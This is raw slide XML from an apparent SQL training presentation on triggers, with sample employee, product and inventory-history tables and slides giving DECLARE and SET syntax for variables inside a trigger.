                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>name</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>salary</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>bonus</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>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Anil</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1000</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100</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Abhishesk</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>5000</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>500</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3456" name="Google Shape;3456;p558"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2944150" y="1035625"/>
            <a:ext cx="3555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rPr>
              <a:t>emp</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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0" name="Shape 3460"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3461" name="Google Shape;3461;p559"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="221525"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3815">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Triggers Example2</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3462" name="Google Shape;3462;p559"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="270925" y="1460225"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1022200"/>
                <a:gridCol w="1285475"/>
                <a:gridCol w="1153850"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>p</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>name</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>qty</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381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IPhone15</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100</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3810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Laptop</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r>
              <a:tr h="381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TV</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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3463" name="Google Shape;3463;p559"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="123413" y="866350"/>
            <a:ext cx="3555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rPr>
              <a:t>product_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3464" name="Google Shape;3464;p559"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1834550" y="3646850"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1399550"/>
                <a:gridCol w="1399550"/>
                <a:gridCol w="1399550"/>
                <a:gridCol w="1399550"/>
                <a:gridCol w="1399550"/>
              </a:tblGrid>
              <a:tr h="393600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>pid</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>qty_chng</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>t_type</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>t_date</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="3301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1</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IN</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en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2023-11-29</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="3301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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>OUT</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2023-11-28</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3465" name="Google Shape;3465;p559"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2916325" y="3068538"/>
            <a:ext cx="43563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rPr>
              <a:t>inventory_history_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3466" name="Google Shape;3466;p559"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3072975" y="794225"/>
            <a:ext cx="3555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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>warehouse_db</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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0" name="Shape 3470"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3471" name="Google Shape;3471;p560"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379050" y="316900"/>
            <a:ext cx="8520600" cy="24426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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>If you want to use variables in the trigger, you can declare them using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>DECLARE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> statement:</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3472" name="Google Shape;3472;p560"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341900" y="3028750"/>
            <a:ext cx="8385900" cy="10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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DECLARE &lt;VarName&gt; &lt;DataType&gt;;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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6" name="Shape 3476"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3477" name="Google Shape;3477;p561"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="302850" y="926500"/>
            <a:ext cx="8520600" cy="12078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None/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How to declare a variable inside trigger?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3478" name="Google Shape;3478;p561"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437550" y="2282825"/>
            <a:ext cx="8385900" cy="10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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DECLARE &lt;VarName&gt; &lt;DataType&gt;;</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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2" name="Shape 3482"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3483" name="Google Shape;3483;p562"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="302850" y="926500"/>
            <a:ext cx="8520600" cy="1207800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2730">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How to initialize a variable inside trigger?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2730">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3484" name="Google Shape;3484;p562"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437550" y="2282825"/>
            <a:ext cx="8385900" cy="10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rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;VarName&gt; = Value;</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide5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8" name="Shape 3488"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3489" name="Google Shape;3489;p563"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256000" y="1552550"/>
            <a:ext cx="8520600" cy="22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520">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Learning Reference</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3520">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3490" name="Google Shape;3490;p563"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1347250" y="2191750"/>
            <a:ext cx="6554700" cy="13197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3400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.w3schools.com/sql/</a:t>
            </a:r>
            <a:endParaRPr sz="3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8"/>
          <p:cNvSpPr txBox="1"/>
